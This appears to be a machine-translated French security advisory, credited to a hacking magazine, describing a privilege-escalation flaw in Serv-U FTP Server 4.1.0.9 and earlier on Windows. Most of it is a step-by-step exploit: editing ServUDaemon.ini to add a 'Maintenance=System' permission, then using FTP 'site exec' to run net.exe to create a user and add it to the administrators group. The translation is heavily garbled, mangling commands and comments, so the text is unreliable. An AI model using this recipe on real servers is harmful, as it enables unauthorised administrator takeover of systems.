Locale des privilèges élevés: Oui
À distance des privilèges élevés: Oui
conditions d'utilisation: le profil de Serv-U sur une modification de permissions
Avertissement: Ce n'est qu'une escalade de privilège idées et méthodes.
1, le logiciel concerné
Serv-U FTP Server 4.1.0.9 (et toutes les versions précédentes)
Deuxièmement, le système affecté
Toutes les versions de Microsoft Windows Server 2003
Toutes les versions de Microsoft Windows XP
Toutes les versions de Microsoft Windows 2000
Toutes les versions de Microsoft Windows NT
Troisièmement, avis
Serv-U FTP Server pour RhinoSoft produit un logiciel ftp Sserver, aujourd'hui largement utilisé dans le monde entier. Après j'ai trouvé, Serv-U FTP Server fichier de configuration stockées dans le Serv-U FTP Server fichier de répertoire de fichiers ServUDaemon.ini. Si l'utilisateur local ou limité à un attaquant distant d'avoir une compétence générale pour l'accès au dossier et de fichier attentivement le contenu du processus de la structure ServUDaemon.ini FTP peut utiliser le système pour exécuter des commandes arbitraires avec des privilèges SYSTEM.
4 Analyse défaut,:
Serv-U FTP Servez les clients à l'avenir donnera le stockage des informations de configuration et le fichier ServUDaemon.ini. Y compris les droits de l'utilisateur à l'information et pour accéder à des informations d'annuaire. Local d'utilisateur limité ou un attaquant distant de lire et d'écrire aussi longtemps que Serv-U FTP Servir le répertoire du fichier, vous pouvez modifier les fichiers dans le processus de répertoire ServUDaemon.ini FTP de réalisation de la télécommande, les privilèges d'administrateur local du système de FTP exécuter des commandes arbitraires. version du système et non soumis à l'impact. (Information Sélectionnez "Registre de stockage et le système" sans ce défaut touchés)
5 Méthode d'essai,:
1, le test local
Supposons qu'un utilisateur local limitée pouvez naviguer sur le Serv-U FTP Servir le répertoire du fichier. Trouver le fichier ServUDaemon.ini. Utilisez le Bloc-notes pour ouvrir le fichier original dit à peu près:
[Global]
Version = 4.1.0.0 / / Serv-U FTP Server numéro de version
ProcessID = 584
RegistratinKey = + UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB
[Domaines]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 fichier / IP / d'accueil et nom de domaine, les conditions de port
[Domain1]
User1 = | zihuan 1 | 0
[USER | zihuan = 1]
Mot de passe = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c: / / peut parcourir le répertoire
TimeOut = 600
Access1 = C: RWAMLCDP |
Si ServUDaemon.in fichier modifié comme suit:
[Global]
Version = 4.1.0.0
ProcessID = 584
RegistratinKey = + UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB
[Domaines]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Domain1]
User1 = | zihuan 1 | 0
[USER | zihuan = 1]
Mot de passe = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c:
TimeOut = 600
Entretien = Système de fichiers / / Type autorisations
Access1 = C: RWAMELCDP |
Le ci-dessus, plus que le contenu original d'une "Maintenance System =" Enregistrer après le montage. Ensuite, utilisez la connexion FTP Serv-U pour le serveur FTP après la mise en œuvre de la commande suivante:
Ftp ip ouverte
Connecté à la propriété intellectuelle.
220 Serv-U FTP Server v4.1.0.0 pour WinSock ready ...
Utilisateur (IP: (none)): le fichier id / / structure d'entrée d'utilisateur
331 Nom d'utilisateur correct, s'il vous plaît envoyez l'adresse complète E-mail comme mot de passe.
Mot de passe: mot de passe du fichier / / mot de passe
230 Session, continuez.
Ftp cd fichier winnt / / dans le répertoire winnt win2k, si elle est WinXP ou Windows Server 2003 doit être le répertoire Windows.
250 Annuaire changé en / WINNT
Ftp cd system32 fichier / / dans le répertoire system32
250 Annuaire changé en / winnt/system32
Ftp quote site exec ziHUAN zihuan net.exe utilisateur / Ajouter un fichier / / utiliser le système de fichiers net.exe ainsi à l'utilisateur.
200 commande EXEC succès (TID = 33).
Ftp localhost devis site exec net.exe administrateurs zihuan / Ajouter un fichier / / mise à niveau vers super-utilisateur
Cette augmentation dans le système local, un mot de passe pour la zihuan: ziHUAN super-utilisateur. Pouvez aussi directement le site cite exec localhost net.exe administrateurs utilisateur / add commande à l'utilisateur actuel de mise à niveau vers le groupe de super-utilisateur à faire. Bien sûr, vous pouvez exécuter n'importe quelle commande sur le système.
Déclaration:
Livres seulement de décrire les problèmes de sécurité possible, l'auteur et le piratage X Files magazine ce bulletin de sécurité n'est pas de fournir une garantie ou une promesse. Comme la propagation de l'utilisation des informations fournies dans cet article, à la suite de toutes les conséquences directes ou indirectes de la perte par l'utilisateur lui-même est responsable, l'auteur n'assume aucune responsabilité à cet égard. Les auteurs ont révisé ce bulletin de sécurité et d'interprétation. Pour cet article, reproduit ou transmis, pour assurer l'intégrité de cet article, y compris la notice de copyright et tout autre contenu. Autorisé sans que l'auteur ne peut modifier ou changer le contenu de cette annonce article.